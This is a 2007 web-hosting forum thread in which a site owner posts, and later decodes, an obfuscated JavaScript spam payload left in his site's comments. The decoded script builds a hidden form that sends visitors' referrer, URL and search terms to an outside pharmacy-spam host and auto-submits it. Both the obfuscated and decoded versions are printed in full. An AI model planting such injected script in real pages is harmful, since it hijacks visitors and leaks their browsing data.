hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Dedicated Server : I got this from a spammer
Reply

Dedicated Server Current and past experiences with dedicated server providers, bandwidth, and server performance. Review managed and unmanaged dedicated web servers, discuss both Windows and Unix dedicated server solutions, and discuss dedicated hosting providers. If your service is unavailable, please click here.
Forum Jump

I got this from a spammer

Reply Post New Thread In Dedicated Server Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 06-01-2007, 04:13 AM
hardjoko hardjoko is offline
Web Hosting Master
  
Join Date: Feb 2005
Posts: 990

I got this from a spammer

Code:
<script>var temp="",i,c=0,out="";var str="60!83!67!82!73!80!84!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!83!99!114!105!112!116!34!62!13!10!60!33!45!45!13!10!115!99!114!95!49!61!34!60!102!111!114!109!32!110!97!109!101!61!39!120!39!32!109!101!116!104!111!100!61!39!112!111!115!116!39!32!97!99!116!105!111!110!61!39!104!116!116!112!58!47!47!97!108!108!105!110!46!116!111!112!102!105!110!100!105!116!46!111!114!103!47!115!101!97!114!99!104!46!112!104!112!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!113!39!32!118!97!108!117!101!61!39!98!117!121!32!99!105!97!108!105!115!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!97!105!100!39!32!118!97!108!117!101!61!39!52!53!48!51!52!39!62!34!59!32!13!10!13!10!118!97!114!32!114!61!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!44!117!61!100!111!99!117!109!101!110!116!46!85!82!76!44!116!61!34!34!44!113!44!115!101!61!34!103!98!34!59!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!103!111!111!103!108!101!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!103!111!111!103!108!101!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!109!115!110!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!109!115!110!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!108!105!118!101!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!109!115!110!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!121!97!104!111!111!46!34!41!33!61!45!49!41!123!116!61!34!112!34!59!115!101!61!34!121!97!104!111!111!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!97!108!116!97!118!105!115!116!97!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!97!108!116!97!118!105!115!116!97!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!97!111!108!46!34!41!33!61!45!49!41!123!116!61!34!113!117!101!114!121!34!59!115!101!61!34!97!111!108!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!97!115!107!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!97!115!107!34!59!125!13!10!105!102!40!115!101!61!61!34!103!98!34!124!124!40!40!113!61!114!46!105!110!100!101!120!79!102!40!34!63!34!43!116!43!34!61!34!41!41!33!61!45!49!124!124!40!113!61!114!46!105!110!100!101!120!79!102!40!34!38!34!43!116!43!34!61!34!41!41!33!61!45!49!41!41!13!10!13!10!115!99!114!95!50!61!34!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!117!39!32!118!97!108!117!101!61!39!34!43!117!43!34!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!115!101!39!32!118!97!108!117!101!61!39!34!43!115!101!43!34!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!114!39!32!118!97!108!117!101!61!39!34!43!114!46!115!117!98!115!116!114!105!110!103!40!113!43!50!43!116!46!108!101!110!103!116!104!41!46!115!112!108!105!116!40!34!38!34!41!91!48!93!43!34!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!107!101!121!119!111!114!100!39!32!118!97!108!117!101!61!39!37!75!69!89!87!79!82!68!37!39!62!34!59!13!10!13!10!115!99!114!95!50!95!49!61!34!39!62!34!59!32!13!10!115!99!114!95!51!61!34!60!47!102!111!114!109!62!34!59!32!13!10!13!10!118!97!114!32!116!101!109!112!61!34!34!44!105!44!99!61!48!44!111!117!116!61!34!34!59!118!97!114!32!115!116!114!61!34!54!48!33!56!51!33!54!55!33!56!50!33!55!51!33!56!48!33!56!52!33!51!50!33!55!54!33!54!53!33!55!56!33!55!49!33!56!53!33!54!53!33!55!49!33!54!57!33!54!49!33!51!52!33!55!52!33!57!55!33!49!49!56!33!57!55!33!56!51!33!57!57!33!49!49!52!33!49!48!53!33!49!49!50!33!49!49!54!33!51!52!33!54!50!33!49!51!33!49!48!33!54!48!33!51!51!33!52!53!33!52!53!33!49!51!33!49!48!33!49!48!48!33!49!49!49!33!57!57!33!49!49!55!33!49!48!57!33!49!48!49!33!49!49!48!33!49!49!54!33!52!54!33!49!48!50!33!49!49!49!33!49!49!52!33!49!48!57!33!49!49!53!33!57!49!33!51!57!33!49!50!48!33!51!57!33!57!51!33!52!54!33!49!49!53!33!49!49!55!33!57!56!33!49!48!57!33!49!48!53!33!49!49!54!33!52!48!33!52!49!33!53!57!33!49!51!33!49!48!33!52!55!33!52!55!33!52!53!33!52!53!33!54!50!33!49!51!33!49!48!33!54!48!33!52!55!33!56!51!33!54!55!33!56!50!33!55!51!33!56!48!33!56!52!33!54!50!33!34!59!108!61!115!116!114!46!108!101!110!103!116!104!59!119!104!105!108!101!40!99!60!61!115!116!114!46!108!101!110!103!116!104!45!49!41!123!119!104!105!108!101!40!115!116!114!46!99!104!97!114!65!116!40!99!41!33!61!39!33!39!41!116!101!109!112!61!116!101!109!112!43!115!116!114!46!99!104!97!114!65!116!40!99!43!43!41!59!99!43!43!59!111!117!116!61!111!117!116!43!83!116!114!105!110!103!46!102!114!111!109!67!104!97!114!67!111!100!101!40!116!101!109!112!41!59!116!101!109!112!61!34!34!59!125!13!10!115!99!114!95!52!61!111!117!116!59!13!10!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!115!99!114!95!49!43!115!99!114!95!50!41!59!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!115!99!114!95!50!95!49!43!115!99!114!95!51!43!115!99!114!95!52!41!59!13!10!47!47!45!45!62!13!10!60!47!83!67!82!73!80!84!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);</script>
I must admit he's pretty smart. Can anyone decode all this number?

I mean, the only way to do it is to just run the javascript. But then, if the javascript run, then the page will redirect to another server.

How can we know the encrypted content without the redirection?

Can we use this to hide our adsense code to prevent ******** from knowing pub id?

__________________
How to Learn Math

Last edited by bear; 06-01-2007 at 06:26 AM. Reason: added code tags to prevent display blowout
Reply With Quote


Sponsored Links
  #2  
Old 06-01-2007, 04:18 AM
dotRoot dotRoot is offline
Web Hosting Master
  
Join Date: Apr 2004
Posts: 576
Quote:
Originally Posted by hardjoko View Post
Can we use this to hide our adsense code to prevent ******** from knowing pub id?
From the AdSense policy (AUP):

Quote:
Any AdSense code must be pasted directly into webpages without modification. AdSense participants are not allowed to alter any portion of the code or change the behavior, targeting, or delivery of ads. For instance, clicks on Google ads may not result in a new browser window being launched.

Reply With Quote
  #3  
Old 06-01-2007, 04:35 AM
ralex ralex is offline
Junior Guru Wannabe
  
Join Date: Mar 2003
Posts: 73
When decrypted, it's just a redirect script written and encrypted in js

Last edited by ralex; 06-01-2007 at 04:42 AM.
Reply With Quote
Sponsored Links
  #4  
Old 06-01-2007, 06:04 AM
tsj5j tsj5j is offline
WebHosting Master
  
Join Date: Dec 2006
Posts: 4,075
Someone determined enough to get your adsense ID won't stop just at that.

Javascript is client sided - it can NEVER be encrypted, only obfuscated.

Reply With Quote
  #5  
Old 06-02-2007, 07:08 AM
hardjoko hardjoko is offline
Web Hosting Master
  
Join Date: Feb 2005
Posts: 990
A redirect script? In what language?

__________________
How to Learn Math

Reply With Quote
  #6  
Old 06-02-2007, 07:15 AM
hardjoko hardjoko is offline
Web Hosting Master
  
Join Date: Feb 2005
Posts: 990
I decode the stuff using microsoft excel. This is what I got:
<SCRIPT LANGUAGE="JavaScript">" """<!--" """scr_1="<form name='x' method='post' action='http://allin.topfindit.org/search.php'><input type='hidden' name='q' value='buy cialis'><input type='hidden' name='aid' value='45034'>"; " """" """var r=document.referrer,u=document.URL,t="",q,se="gb";" """if(r.indexOf("google.")!=-1){t="q";se="google";}" """if(r.indexOf("msn.")!=-1){t="q";se="msn";}" """if(r.indexOf("live.")!=-1){t="q";se="msn";}" """if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}" """if(r.indexOf("altavista.")!=-1){t="q";se="altavista";}" """if(r.indexOf("aol.")!=-1){t="query";se="aol";}" """if(r.indexOf("ask.")!=-1){t="q";se="ask";}" """if(se=="gb"||((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))" """" """scr_2="<input type='hidden' name='u' value='"+u+"'><input type='hidden' name='se' value='"+se+"'><input type='hidden' name='r' value='"+r.substring(q+2+t.length).split("&")[0]+"'><input type='hidden' name='keyword' value='%KEYWORD%'>";" """" """scr_2_1="'>"; " """scr_3="</form>"; " """" """var temp="",i,c=0,out="";var str="60!83!67!82!73!80!84!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!83!99!114!105!112!116!34!62!13!10!60!33!45!45!13!10!100!111!99!117!109!101!110 !116!46!102!111!114!109!115!91!39!120!39!93!46!115!117!98!109!105!116!40!41!59!13!10!47!47!45!45!62!13!10!60!47!83!67!82!73!80!84!62!";l=str.length;wh ile(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}" """scr_4=out;" """" """document.write(scr_1+scr_2);" """document.write(scr_2_1+scr_3+scr_4);" """//-->" """</SCRIPT>

Wow, we got a masterpiece here.

__________________
How to Learn Math

Reply With Quote
  #7  
Old 06-02-2007, 07:20 AM
hardjoko hardjoko is offline
Web Hosting Master
  
Join Date: Feb 2005
Posts: 990
Wow... This guy is cool. He spammed my website but I want to know more from him.

__________________
How to Learn Math

Reply With Quote
  #8  
Old 06-02-2007, 08:45 AM
Xandrios Xandrios is offline
Web Hosting Master
  
Join Date: Jun 2004
Location: Bay Area
Posts: 1,317
Cool? Its just a lame ASCII disguised redirect script. If this is being posted on your website you have security issues...no user post should be allowed execution of JS code.

Reply With Quote
  #9  
Old 06-06-2007, 10:31 AM
hardjoko hardjoko is offline
Web Hosting Master
  
Join Date: Feb 2005
Posts: 990
Don't worry. All comments are moderated. I deleted all this **** and reported the spam.

__________________
How to Learn Math

Reply With Quote
Reply

Related posts from TheWhir.com
Title Type Date Posted
Spammy Hosting Clients Won't Affect Your Site Ranking: Google Blog 2013-04-10 13:36:07
cPanel Conference 2012: Social Media for Customer Service with Mario Rodriguez Web Hosting News 2012-10-10 15:12:10
eleven Email Security Report Finds Decrease in US Spam Web Hosting News 2011-06-16 19:17:06
Security Firm Symantec Report Finds Spammers Using Fake URL-Shorteners Web Hosting News 2011-05-30 15:41:52


« Previous Thread | Next Thread »
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Linear Mode Linear Mode
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:

Advanced Web Expands to RagingWire Virginia Data Center

123-reg Launches New Cloud Server Range

Host Surf UK to Launch UK Cloud Hosting Service in January

Web Host Midphase Launches Client Perks Program to Provide Exclusive Deals

Web Hosting Sales and Promos Roundup – October 5, 2012

SingleHop Offers Dedicated Server Discounts with its New Data Center Outlet

Web Host Infinitie Networks Rebrands as ServerHub

Web Hosting Provider Host Cats Launches Dedicated Servers in India

Web Host Codero Launches Smart Servers Hosting Solutions

Peak Hosting Launches Dell R815 Dedicated Server for Large Scale Memory Requirements



 

Learn more about advertising opportunities across the iNET Interactive Network.

LiquidWeb
X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?